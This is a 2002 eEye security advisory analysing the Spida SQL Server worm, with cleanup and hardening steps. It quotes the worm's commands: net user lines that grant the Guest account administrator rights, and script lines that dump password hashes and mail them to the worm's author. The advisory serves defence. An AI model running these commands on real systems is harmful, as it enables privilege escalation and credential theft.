Research Archives > Security Advisories > AL20020522
ANALYSIS: Spida or Digispid.B.Worm SQL Worm
5/22/2002 12:00:00 AM
5/22/2002 12:00:00 AM
Default installations of Microsoft SQL Server
The SQL worm (AKA: Spida, Digispid.B.Worm) infects by inserting itself into MSSQL database servers with no password protecting the SA (System Administrator) account. The worm executes commands on the vulnerable server using the "xp_cmdshell" General Extended Procedure, and the commands it executes activate and configure the Windows "Guest" account so it can be used to copy files over to the vulnerable machine via Windows file sharing. After the files have been copied over, they are "hidden" and the worm goes into a cleanup phase. It deactivates the Guest account and changes the password for the SA account.
The worm then creates a file containing details about the network interfaces, database, and Windows account password hashes. This file is emailed to firstname.lastname@example.org, which we are guessing is an email box created by the worm's author. Finally, the target machine begins to scan for other machines and continues the chain of infection.
As mentioned before, the SQL worm spreads by inserting itself into MSSQL database servers that have no password protecting the SA (System Administrator) account. It executes commands in a command shell (cmd.exe) using the "xp_cmdshell" General Extended Procedure.
The commands the worm executes are as follows:
net user guest /active:yes
net user guest [random 4 byte lowercase alpha string]
net localgroup administrators guest /add
net group ``Domain Admins`` guest /add
This activates the Guest account, changes the password for the Guest account, and adds it into higher privilege groups.
Next, the worm "unhides" its files on the infected "attacker" machine, then it copies itself into the Windows system directory of the vulnerable MSSQL server. You will not be able to see these files normally because they are marked "hidden". You can use the "attrib" command from the command shell (cmd.exe) to unhide and delete them. The description and location of these files is listed below:
Used to run commands on a remote MSSQL server:
Command Line Emailer:
Core worm processing script - contains functionality for scanning, backdooring, and the sending of retrieved data to the assumed author of the worm:
Used for initial worm infection once a vulnerable host is identified:
Collects general information about local databases:
Timing library used by the worm:
SAM library used by pwdump.exe:
Grabs password hashes for Windows user accounts; these are not the actual passwords, but retrieving the actual password is very possible if the existing passwords are weak:
Note: %WinDir% is just an environment variable for your Windows base directory. The shell will replace this with the name of your registered Windows directory. This is usually "Winnt" or "Windows".
Next the worm will deactivate the Guest account and remove it from the Administrators and "Domain Admins" groups. After the Guest account is removed, the worm will also changed the SA account password to a random, four-byte lowercase alpha string. The worm instance on the target machine now creates a file containing various information about the server it has just infected. After the file is assembled it is mailed to the assumed author of the worm. This process is done with the following commands:
shell.Run("cmd /c ipconfig /all > send.txt", 0, true);
shell.Run("cmd /c cscript sqldir.js . sa " + WScript.Arguments(0) + " /r3s >> send.txt", 0, true);
shell.Run("cmd /c pwdump2 >> send.txt", 0, true);
shell.Run("clemail.exe -bodyfile send.txt -to email@example.com -subject SystemData-" + WScript.Arguments(0), 0, true);
Now the worm triggers the infected target machine to start infecting other machines in the same manner that it was infected.
Free SQL Worm Scanner from eEye Digital Security
Trend Micro Analysis
Change your MSSQL Server "SA" password immediately and disable the Windows Guest account. If you currently use the Guest account then you should change the password. You should also change passwords for any other account on an infected machine because upon infection the password hashes for each account were collected by worm and emailed to the worm's author. The passwords may have retrieved by the author or by anyone in the communication channel between him and you. ;)
Delete the following registry keys:
Delete the worm files:
attrib -h %WinDir%\system32\drivers\services.exe
attrib -h %WinDir%\system32\sqlexec.js
attrib -h %WinDir%\system32\clemail.exe
attrib -h %WinDir%\system32\sqlprocess.js
attrib -h %WinDir%\system32\sqlinstall.bat
attrib -h %WinDir%\system32\sqldir.js
attrib -h %WinDir%\system32\run.js
attrib -h %WinDir%\system32\timer.dll
attrib -h %WinDir%\system32\samdump.dll
attrib -h %WinDir%\system32\pwdump2.exe
Unregister the timer.dll used for scan and infection timing:
regsvr32 /u TIMER.DLL
1) Change the "SA" account password on any MSSQL database server that you administer so that it is not blank or easy to guess.
2) Get all of the latest Service Packs and Hotfixes from Microsoft to help prevent general worm infection.
Copyright ©1998-2011 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.